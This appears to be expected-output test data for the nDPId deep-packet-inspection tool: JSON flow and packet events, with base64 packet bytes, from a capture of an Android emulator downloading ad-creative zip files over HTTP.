+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2303,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":1654385184953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184953,"pkt":"nLbQ0+MztKXvZygQCABFAAXI4EEAAPgGoGkSQGcewKgCfgBQjxzkQ1FrjUA08oAYAIN68QAAAQEICkYs\/7OcUadKtLVLEjgcUYII4FHbZjHquoOia6gAb500Ti8dAwhCBQPI+mqikzoPEDELPc+SXj69jEqwdCpvDTvdYMfugkxkR1Y+CY9qVGm58StJYmYN5SvxMAz8xCmsligFCuuKmg8EZSE5OqcTkF7WWZmYJJGWhwpN7ilBu8\/gl+3Ab8Spn6tvJdeT+RsqcUG0ZFXerb57NPtt03zJpCtCoTxHMV9Zha5yoUwKNC+6e7j1ViGTaOWGh\/7JwCnGB12U4uBR548F\/rgqEud2uv0wHCBv6DuHmOo5bYd\/toEAzTnRwVytNl\/PJi1A0jYr8KsFpOACb3f7cGrTVbOZNYAAfhKkPOD4uriBbk9Jgk\/UjgwbpqX6abrGR34H+Os\/9jStodDE0Y0g3lOkmBfCKamPyPplsqvWJMBQnNHW0rSzXLwhjLCCsvswVQxnEHtu2HFz998SHtil2W03a8HGmk23nbaNYcY3Q2TQbJ3ZzG4FUhaRnvC2msLVbUsGHn\/8qqFhILJC24vplvrOmxsbreba663VzXsP1t950FpdXn11XW4T6v8OCO1QAuQXRErxFVq\/3Wbyah+mKVYtt08bMZ0HIKAAIUvKhHqZkAtfQNHQOwlIflLQ1gvauCXLAC9chbkxNKbadnsPBCGT+eVNsWhIXlnO4qie\/YB3Dn2nVklQbot4gdeaomDlGHGq2R9pxd9CVm8l9JyOW1IjlmYi4kIepJ+YLD\/gRPZSkymg00iOy0dkhWzUmLBjYKPplsOvhIi5ELVnoR4dQ7fdKWhHiLBAG9A4j2EAC4y1lGtIy6U7GUejmNJozx3D7sS1yIaLjW1\/AnhEE5Tn3wYlQUNcSbmW9EiPIws1msCzH+E5Uu15TvEJU927RoehtQDvXtR6D0i0Qq4r5lKtMY9x1WAUFjlBkqF9BUaESQB2UsBt7+aLYGJaqBfsZkpASprto2iSKUBpaREEHmhszyoycYMyWrK32VyqU7U+0B8\/j9v8HYKpxmhJ9hmaqfPgXycn03DcwMlnex1\/w0vDwfnVHTtC60LkWMig3KoxX9wp6lUobpfyzZnA1KioElYxEkVLF2DRfjSYmQmEaUL6Vt1Pw1px2QImO0RR3K\/Su8d8oWRu9X0PL5jx0aICKHpBkVigDUHjb5hz1+ER9ZpujGIXmoxXSVEVDlqITEvN1XLQn0q5WrD4RQNqo05O8NY0zUIyjeYmR0HIha8iWNR82tC+DDAAS3rFxtBufFlLahMzkSEmBJezzMOIAuYi7YaCqpZTksGSGvk200r5PKi3stxcb73ZXF7ZWG+tbb6xfPeeZWgGOW1JJ9YCDFBxJwjXXym8MTPWXyGLVLqNExYXwpJENPgu3TEwo4fsbie0u2TLY5ZAkS0FbEksjw+rnfXYKDa6Tj1apqdRm58JsDc9f3o6XkPSciEbM2sJbxaQKDeKAokNafx4rI5T7B6r\/myV2gwsY93jrVLHNNQuiu+r+M3NvePsMJ8re\/P5Entz1pZnpyPPzjYGWEI
krYJgAUSjmQm2JaWtrAsGyjyJ40iSCcRtSf1AH86Ym17gzRFqQTTeEs9X4ijRzHu1H8VBz3vPdXTmElnKhBlDqqJJI1FsUyyFCXkqDIVqSYNsV6Fsixm+M9dhWnTKi7hX4lJiuC6kPjhJK6UNeIcvhYdT5\/\/5p797\/8P\/\/eqvvv7sy7MP\/xabjQRt7X6Xwkc8\/fjPzv7kKxhaPT0jY5FpLhGCSvvgpZ7+4oMnX\/x1nZumP\/n14\/PHP1ctr0tqQdm04tmff\/q7738q6zLea7VVsGYqx+ksN3ymz2gjwFgx2a6hp\/O\/+4zwkaDjMjscMtTzf\/+n87\/\/QJlMMlM\/f\/w\/5z\/770uGghjfoqqNEk43lcb01hb7eY6\/nzpNlJ9KFcdEUlBQOZZmiMlN"} 02408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2304,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":3,"flow_last_seen":1654385184956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184956,"pkt":"nLbQ0+MztKXvZygQCABFAAXI4EgAAPgGoGISQGcewKgCfgBQjxzkQ3h3jUA08oAQAIMNwgAAAQEICkYs\/7WcUadKZmJ1Q4tNW7+zm3LzilKTMs7o+j0bU4bevfG98VcexwRoqg0MK4kroCFJI0vkItJ0sWhKhqw+9VVqDQxktos+tw4JRGmcHh\/FKDlLh6zdkg3MQ\/lsHnZqw9K8bpKO655k6IwFAFfkDIJOJsdMB+TwhRR+SOFiIw+5j\/JW34gGnNHirK\/zZi\/hc4QwIcK2rxzXZ7rsKwq47b\/gBNM4MIbxBQADwYMZQnsmuVNzekN4FKQkhHHGTTWkH\/wjQGDyySIj8Jzph54pd5aM+OhhOvR5PcMjO93tjhYc9KM4buIZr3AxnxM3iOqL5Y3DNOtFZMTe0kqYCIlor5EOmzY1\/QgcEzRxv4\/lxU4YCiiS+0\/ddMRHjjkiUXhuhD7QYUQQTZCQrhPijw50JVjw3pUlzCIsuoRiKmcNsq2sVpURgyb28KvUizskeSI14ZCZ1RGfnHTHy1yPRsG0Pt5Ma8nqKdONtNWUPEMbKU4qooS4ZVgy4ydRUqGcD3t5XLzKk6xQksEKLZeRc4zABSD22VISyrxIGnnot0UQF1jM0L5wq+PXoJypbcccDHIPqtdae6MvXKZyFZZ2Af1r5SARKk8jHFMScw1ZklPh5TmRIMY25u7JI8Kf0InpWIggg\/dCNXQ9mbCzi9IVFwQ4Bcza9Gx560XkmFinHDZS4kv+q6dM6HPsExiSjjM+3qTzEyp6QYtbZYue7chnn411pGZv4KwRjPOakaMAbYLhhCPstBZrv27XKHfgDg3UdMswyDmbrdhNZpK2+\/bwcJCkmrX3nBdsQ2VeuZ\/YA4u3j0cd1g9errygLeJTAN\/nCWDbbXhdHGF4z7CdykwDxiJacPDxG9YuwukG8499nzt4zVg40U\/jMp1lunPB3JJQoS5Bp6kxA9vvK2Fg2I3BaQrLU2XnWALaTVI1pGgZ30OUAvDFCxhKEFX\/Q9eQ1hjjNWxpFqXih\/EZbZu2sX9wk7UWkXlhwRGjhZFb93t26v1JRJhHdI1nd+wyJYqGt5\/UP4S9xI3VTwDw+41F2Yi29WTvXG\/pYAGqMGJVprBGfV8dw\/pIGjYrc8JqDjc8iMynFaFgS9VWRno
\/kEa8ex8E0lXW6KSRO+38U5BEcAQa2ZmiPJVOSufJn2mHFnNtaFnQ00UpNEKFlWmg1g+m2HMDI6hkKoxWNNVaXHB7BeI37bfq0DKy4008moSOwx9MywU31umt9bQZaqMjpRF3V4DnOWXRFCtBzASqMlEpsEloiva6ZYQbYAWkcMxY5ybRoJiWx9mUKg4GcOghBqQMpMlaJSVXeGZFKl2Sb1+XUUdSwGZgyfEfyo4raVkpT+wyQpPZHBqAgGOncYulA1GZOsA\/94GmmxzjZCbCN9kynAgWzvYDvij7PUFZtMjkAvBACnPBNn3iaPQjTawbAkTcC1yfhv1ofpKiE5U2LdirARat2rkhdX\/4rJG+DaIEorg08ZpEvVnDkzmskUSlB9W+vjp\/V+aS5lkVM3k7zhoEnC+refT73qPAiB+97ySNdyAd\/Q7kYXug5+OANwWHp1LJTg\/kTpM0hWrac+UY7fWgQ8CbScQvQ7jNvfkeBpNC3rXL87XiJvZKnnKxFCuxFmcRnJQ7BpentFWts0H4Lec1Vh6Ie1JUOsAGqbQKPj08\/Fb+sNPHqQaGAhUMQMv5qLjVGC16+Ay768Xh4QOfbVnp2QvxXOq+J6pefxmdaleLIJA69iWkMygEnv\/UiI8ax5fku6tnS6jfWz1JxgQ4MCgzJju8Y+AntdNCizMmrc96qjo8fELIC6aln6uHdf6ze3P9\/l8K0Imh63d3YWSKHvLgvoT29bJdkoNvyjOuueHNZ1szJTEa6iq1dzn+UBN2G\/xCnDeBIWRhg1e0rq+0LEgtBi8qgQyMbqwUz1KCNzlpSIzr13Jt"} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2304,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184938,"flow_last_seen":1654385184956,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3201,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385184956,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
+01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2304,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184938,"flow_last_seen":1654385184956,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3201,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385184956,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
02398{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2315,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184965,"pkt":"nLbQ0+MztKXvZygQCABFAAXIGm4AAPgGZj0SQGcewKgCfgBQjyD+smSW9c2PrYAQAIOKbwAAAQEICklV7wucUadQ5ogdq\/iosAYQHnuYoAkvkdnGEx7sgfMQlGGrFxZA1yFkqy5MoicrPqJw3gr9hAgjam6KaAwuXrhWKQF6GuXGbBvVErM+rqhTqw0S+mOoHLEY4s4FqWJIQ1cT5cQHITPEUA8NmsKXQx4OPNTUF1gsmkFJG+W9FLWdk8qI2aIQV\/yYMeSGTw74FvYOMM4DyYjkedi25Hlaxn6nKYMGLSn2thPUrK2WshGdhHAxCSxIaZduwRhEPOo4bZFCUfAig1xMlQhT102Z6\/h1jyy9Y2FOTqxE4We1SIl3jgw9N+ghK12R0K7udpiQwRquQJKK59ShtftqxFuHqgWu9ioVh2g7O7EbTedwRtJMXbm0ah2kTJ32xO0TZEG94g8bjMzkcl1m3NuSQw+Jl+nhpxe0XCTzjwmTR3B\/Ayh0joMwTcVU2JgiBD0+DOZ\/XeBiYQ47TG1YlpfqWRWnMCzc7Wb7RbHp9OvR2Dc\/\/dwQkuEIkywFK3CRRNMAQasTEI24+xJG+ceiAlhwwXcWRghi2LpCgYAXHIsWQg5EML3sL0y6ODzBfVQUS9EEMXT\/2DwkfHfhkvkhNgQM4\/HEWo2BJFkgiwENsFXve6AnZRxrdslQMuUEOyqAwAsg8ZYXYIM\/iSfJEwHuox95SJebwd6lXVS\/GZqiCrX5qldHVAhpCpb5CVC06kelCqTHtkKWudqMQc1RbGEIfFZhjmJQ86si71pVcWKFDatzRg5mMPpjAXegcI0htoQUKHqgjP8bD4GhWKuktB2K8eCMtWlkSJoUINAL4oOUMURQegH1KF0FB2ahoJCJ9vVZg1pKEWlCBA9EE\/oz8327GODGRhfm0Y7ZA+DkZIe4ubBhHXkA10YPFILhA+cgoMIIs2nF6k3Yg9gZFOzK5gseWgqegfNZe5U2cULZfTDMGvNjVhhkqLtrDRuG2aoghuLXZMY5euQeWmygK9GtF2hzgV6OIMtTMVTz793WI9WGVpxqcWjE0WCzJ67\/Odismm8FSxIv3cjWS2JgaDe4UAykmF1npgOZ8mc+HRFFsJsZs2nokg1Z9LbmG\/uS8WdEClrpbQGk7OzCpWqnz5pP\/hAxjot+MnBHFeI2gNKiuSjgHGzxUDpBjyR1KRIjWvfIoEeNcasmZg8vOsgdBlCID0kHWcB\/Wnhg6hUicCWIeMDYHjWMEqAMEU+sW2zvpBSItTGVMR\/tG5FDGjnwRbCFQ7H0Q1pyVsYKS\/+bgPQMt6tmN\/QQSVGaqKzfqW73JIcui9eEBVY+RQolSMRVEuLfLL3KcnHV1htUZmHMfXn68WLXop3FFrRIv4ND6JZOBmHJnH7V3piuFJLPipHp4rFbXPJLpaxBs25dRRta2P8nbMKHH8zgQUJvtjGbPG5Qoas8jKRpOG9PfPUMkNTkQdcI05Kq69VlOXml6It2UQduxJOKGs42T7AhFKJPnmjEuxpFJp7Qmp4cgdGB8nTOxTI7UkGRz6h5NUjZQdDvoJgOb5wxHz6DtpYAtRljv5
SjxwtRvetqHLvPS5dqQEKiklws6rQRJRJSgWJc6INl2LpQ2LwzXIzDrxG4KyZkZEea\/BhiYr2lFa9kOoKUxYVoH6stGFraqU0hCb8OxD1kbuo2v4FqacYgYMLVetH0UaKQShTjaFivt0JdBLGUcYiCviMaxoNkPkjpNksgTJENrYzCczP\/c86QKZuvwdgwNCEJas5+M0FA7IwteDjfuG4H+vXhwzxQy+RholpcIZkEH3EYAL9KvuTKixOHHulpoYKtamwQolbV0LFtwXQhkMOgP8lG2b2ZJ+IUM0qTnh19rIOITZJ1INZMWCLVkUGyGrTiGn00YVvPbzgv0rlIYYoB86xhRlni1rNpEhZn7dSqR2Gz1MHTVgUr9qKTdXDaNCJWayo2otmdYEEv"} 02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2316,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184965,"pkt":"nLbQ0+MztKXvZygQCABFAAXIGm8AAPgGZjwSQGcewKgCfgBQjyD+smoq9c2PrYAYAIN7OgAAAQEICklV7wucUadQJspEi0CUOOmI3Cvceu7ZTiQFwaD38Js\/p\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\/VcNqDH99a7piWhDvruNwEIdqktI2GDvEDR2MN+cRA0Drq2ZYeS0jdoQPJysWM8ZCqw7r86FgOTdw\/86RtBT31VleuPjz3IVXMyFirKDF4+Ve2++jcSZHmoXsDy3mQyZ5lCoCfRHm5eAd8ygVLOOwlU84ma9sRJJhQRw9RlIV4BQwStxE\/P+KYRlMT9C1FlrETthUtJn08pmc4CQf5Y64MMSj51HOUvlF1VzoUdG8NWiAa7kb1c\/rFFRcNASFdygmZC0L5oBNNcpSJ6Y5SFUryQF2kzJmxJdUKOnuoLqK5VaUVFBbdmnQzhlj0rxhHV4LhD6zUnEEjQZxFlZ7wA02LeOGLF4IJOUw9qRdPJKkaNW6WtEkbh+a+82HiCzidkwS8ebcWJ1duWnUmydiJt3assevDFk\/X8DFpDcwKd+5ns4Xkhm+2jDq2\/WUCZkq2L1gyzrz9ogyVkhOaNAn28stqziCDjsaLoBQFnh0+pIlPsszStPAV2eh+MvAqccRlLZAYHODR6n6NY5bf+BYIuf9ITT+IIxa\/4VN0UVnUvxrRwoIlUSK0sQ76UbEaURf+evWxATWLaR8y07ulM0Caqds3CjhoCOii7C51OwgaSrstoDBZPcUezxEXmVHSiwlGLx53FAZqoDlcUPLsr9gg2Flf6M1WdfOntS2Jtlu2fbTnz9R9PoHpWfgnrlmDARFCtPhHhajELohr\/Q1PRAY9DS9EjCigt3tqC47UwaU4OoHNoTqRBJDQYjzeR6HqA+79NTpFmHOJ\/uDYfkU9w\/cYaGh2Oit6cuhN7ZwdaS02Fd1az6abPC9BnFbpndrIJxzSL4mmYDMhHhJ8SM3hs1Tpj+ZL\/gsL6Q8PBrwU8cvM3h5+HrSurDwTRw3amJUNhKXU8BUtCpWoiQqzmmxbhhYZM\/XEqRfDnhULOCEo255OrNwVCkUI7kOsZimTiobTTVaISLkpB7LFs3KqMfOIT4bdyQFmwlVZtGIdT8kpJbgMVPYXqYzaQYyWDPRG2IwaY+nq
vmsyj9xZ5oXw7iJkTSkapYZPqKt4i0AcaR7dvMEaCMgCWyikf4axtIXxAc9FMUBUbO6Gbulb0dAH+ywz4t4rgH0BUbKxsq6DLVrxR+Dz3QoSsGslYOjRUxc2nspxMWTnKnbO2+WaKGg1SFoZL97KgRsxHVZt6JuwA1BWIWn7WEPJHy5EWtPF0sCx6QRRsnaDyUNKVgC0bIIsiHciEQeN5GvYNZNmOzanRtRwJ2oP+wBB3AiolTeFEWodeEKa9Vx14liiPDCIQ07+AirkzEaTcwWcI8o2WPc9DCGHQ9deUQQrUozjKmsmbQrE6aq9YqjpDlm0SJhe"} -01173{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2316,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3353,"flow_avg_l4_payload_len":1117,"midstream":1,"thread_ts_msec":1654385184965,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
+01173{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2316,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3353,"flow_avg_l4_payload_len":1117,"midstream":1,"thread_ts_msec":1654385184965,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
06309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1654385184968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":4350,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":4350,"pkt_l4_len":4316,"thread_ts_msec":1654385184968,"pkt":"nLbQ0+MztKXvZygQCABFABDwKKwAAPgGTNcSQGcewKgCfgBQjy5+eHC\/0XpgIYAYAINNZwAAAQEICvuAHVKcUadRtia3OWrUCi577oZVo7qVa1pV4DAWp5BUj1ylZg9HIVDCN9HY7AbTeijAg4XsrglqbYq5vDpykI6WdQmyzYmgrKIxhalIqTk9ryxzUznXMoouNDMlCihWCVviO0KxmTPE5KQ9+7SsAUrQi7Sg+qF5Pd0DtbjZtLz871N0tzex+ukapoFCrA7xXAT7EhUt7xIHEz3L0UmSEhywkGvPteUIxdc6E6toBq3MvO55kaYOGDx48p6ZBs0l28a6bJ4zQJDaeXlGC3OM6mMEiebMI1OGu5tfpXMjhz6Rp73wrdy57Payp01EHIjlCdRLUKOAPfFUuHBSZHV78nHM8xiG0tJng+sW\/lS+Ct4omI2wK1pbPk0VNnnDxoaUD4P9h2HGucJMMsOcLUiwYhj1kheWaGnaKjtJU86IE8hv7kMCVo\/B1CxxE3Lz+jqf+jgF8eENd4d4\/zg\/OJd9i\/VoLDYszM0GnwgrV6X6zCwUU8MUmHILsn1nKkxsK+j59rAslcf4WjgzPH\/bxH1Xf\/hRSG9h1GHU7F7dhqqMXd4GsfiUbI5KewunZSYn3sSrjPhasqzcbZWIOn\/RZGzSCzJrYTqkQVw\/T63VN\/xpgAg02on1ddwj7ZXVGqEZ14pCRJ4U1Nlz4GosQC2e4WkU56BxFokH+fTqlofOKVzfTTBLskJj5p\/BXxTGrZxWaisoBhtbb8NE8Bmwrx8kTZqCTZ4LizErphxTdyPZU8mP1LWCkBnHJ5AFAviY9cnU+ZbIwX1VuD6Djzu3WeCSXVqRfHW4ggvwWzYs\/gP9Jpl67985\/6\/54LGh3CGiAgEgcG6BGxY8R11bg8qYxj2WScXzuo0eu4ZJ1uM5xG3D3x7O7xmZSyQYoEmBJEeWqjVCrbHbJCcpoCpd1s+S3OYYriGysUdQFw3VpBOPd6d6s8rlqWwPuY+gRHRJgJSn+ZHDQFEafniozT+8SkWOQ5rQAe58UhC9CEqwUYXDjACh3vzGpLHKqglIUwlGKGW6YhUdUMwTnxVEN5X0kmoRJNoqHFhBmEY9BmP5+OU4QSH4xOI5zReHcNmGyhmg2dxP4TJYS\/MmkwxJ2PiI+KkAnqHY0xoTbdbyJKU6xxIlj31MxZNGm1P2mPnjEKvm91XbL88c0sI4gC4jtuPQowmsExa7xIVAWeJWpuywE2myad4k0pzsE5rlIj7\/quzGMwjIayYKok+aeditOgqCCIp7Kd3WWcNlzfIetdoBRmGhdKoVdXlxx6Ril9ggFuDcF856+Nzit0M9yvQyF4OmsA18wbuJCw69M9A30ml2L9fxmr1URKoZGMaExc02oNMIn4wHMUyukvZCYS9CJIMDWwrH2TSFMXvF1ikdepy0FG3vigcAcfOcvNka76wATRzD21xzyO4PK8NKUOWFMi9TYaaMjCeHjnWWJnIhuZfBFIVojlQlpoqbIHE5pMbLvRzrT+\/c+c9U3rDurSLvr05vZU3uuVvgIe07OZJ+6XCDm7ZM6e3AlXgcTZ7lB9Y
2alCJr5832MZIIhz9vgnMVtPVR2xymBxqPeVZcUSF88ascPkun62PxmORsMrVddGtvmxECSlwKnz9ikb3r0H2wPbe3tafZ3F7cyBgLihy\/EZ\/5d7W1Joqcq+fgtXBF1qvp8fBtVe5A94Nn0XIHvFgn9MyRia6LxN\/jz9f\/HIPpXDHZ1GXH3N4vL3dd7OrtjcqksxUL3umHNivH\/h1fxXCr3B4fDteDwdZ8BZnR4BtwnVuvEm9fy8RDPZa+2xs6JNNIuYS8y9dWRuyjwc5HpIv1W4V7IHAPifgrbB31tyn2B4Tnow5XvNljMP43jsFONvtKdn0qlfMMIaz5GBmfmEIHi2aEF9c7kXvOf6c6i6Ho4r9L3d+4HGZDTbnuLyWbo3+d8pttm9FB\/vaZov5fj2DX192EQ9XsUgvfsKv3Ja8btDZJooZ10aOkx3Ed3hDWXaZbCq2lh9\/te54Syd34psOYJ5LmEwk3nTe4i3az2bTd4l+2aciRXCt22yvpFWFZmG4dqfUWGuh4d0d8vPGCM\/dw+n8C87fnoIDEau5tajR9lwluJLmT3qANwvwj9UA3CUuFhmuDC38WaUyB22P\/AW7pvquAYgVEcHm+38V8HiTF3TfQF8s4EEt\/nGyY22fP36vJaubKd\/Lsx5MdGyNzrJ4tliXSZuYpui5llx2rs0EepLJCRRIwShmOq8VTWoI7lFOcQdeigF7zyzJICt17FH7xsjRTNluvXNudWS8ckDt\/GCH9zCQHpYtg3FxdezTyW7TMJZYCrG30qqTTL+t4RxzpdY8Arx37bBCDZe+6M5fh8N5jmXukeeGZzYwEDR5LxLrYqeUrBd47Bcqg0Rs\/Nq\/rMSoXyvOWMXnE\/\/eA935FTy7WUl0XdagriM+8I8Uv9Zo8RSV8Ocrvf\/MuDeqHGNfdU9p999Yzx8wHts\/QjqrfiJBQUsKlURNQLYr+Pxph7vufBZ\/Fc5vbqMe6771nH+m7vl9rr0T7\/xRTBfIGGq5HXOdIsI72zo2UPXWY35vDp9ew0lf79IEc1BLyrpqu3PDc2vVEKbEvH2uDM\/5dotey+W3GoQgBt0gWlq1Ffbd0gncyJNkVhqr1BY0YCFX1p9Xt3n+lan7AYgIqRmRtW9l3rnzF0V5pCQfvHdgxXB0xAFfQ9wbnflmyWCAMX8Pit8n0B5iuplKZkVr\/KxKGyHieTJBN5FwzpT90P5djs1bFf0Rf5wxaz1asqwsHzD\/c5+F8LEBzgoPqPAUFIo1eWFKlRhO\/tbO0jPdX3mmk9v3XX+VlE7JjYbO0n4+TynxNb8a1NdLGruQGXq7oZGQBHzhz+I5lK2ng7Gn\/2+DyNJCCYfY9jv\/0f\/z6tnL6iOnCn3mqeG331Q6DtB\/rA\/SNqCtJYdWoge5Li+sAb2lVxB44by6fVRKjvN\/ed46pLkbyNsZjFTHXUOvF79Zmw7uPaf9c\/S3tr3ZetMjrlt\/xLflJbwBB1d6dGEjIG73t66uRtteXbuh5Wp2avHtn+nTVLsCXOSP8DYJa1+0xyJBIuyZygqzrU7nlfLe\/OzCF\/5Jru3JFrUqJ4lEHon\/2ra2fij+fb0Bl59y\/cnJdz0eb2+\/5fNYKtsGJz0wA+9r1f3x\/Xq96U5\/OB7fbl9vu\/sYjEpvs\/cPTr+t3+13XubW9ggXOahqx9tLS7q18deRBAtJhfvoo2y++aqeQD8R9KCF\/Dkiogsvv3klwo1s+T0ed\/+BFzb4qaX720zjbz+dx\/1wVv\/dSeZ\/O50Ptot9xN72sxeoeq0hP71AartzeTr1Uk8s8jX3pn3F5+3y9\/yb09Kjv7czFjwkR+nzjYfe7\/PdPDtShK8T6irCbJPw5MvzUVfJ5p4VsOEFuL2hJvpVhB5gptcWjO4f06+RL+xPxJoZe8c+f7z7khRCp5pn3mmgvHaZjWaZ0bfBQpSDRs3EnlfWIRIQ8pc4XuqHIMc
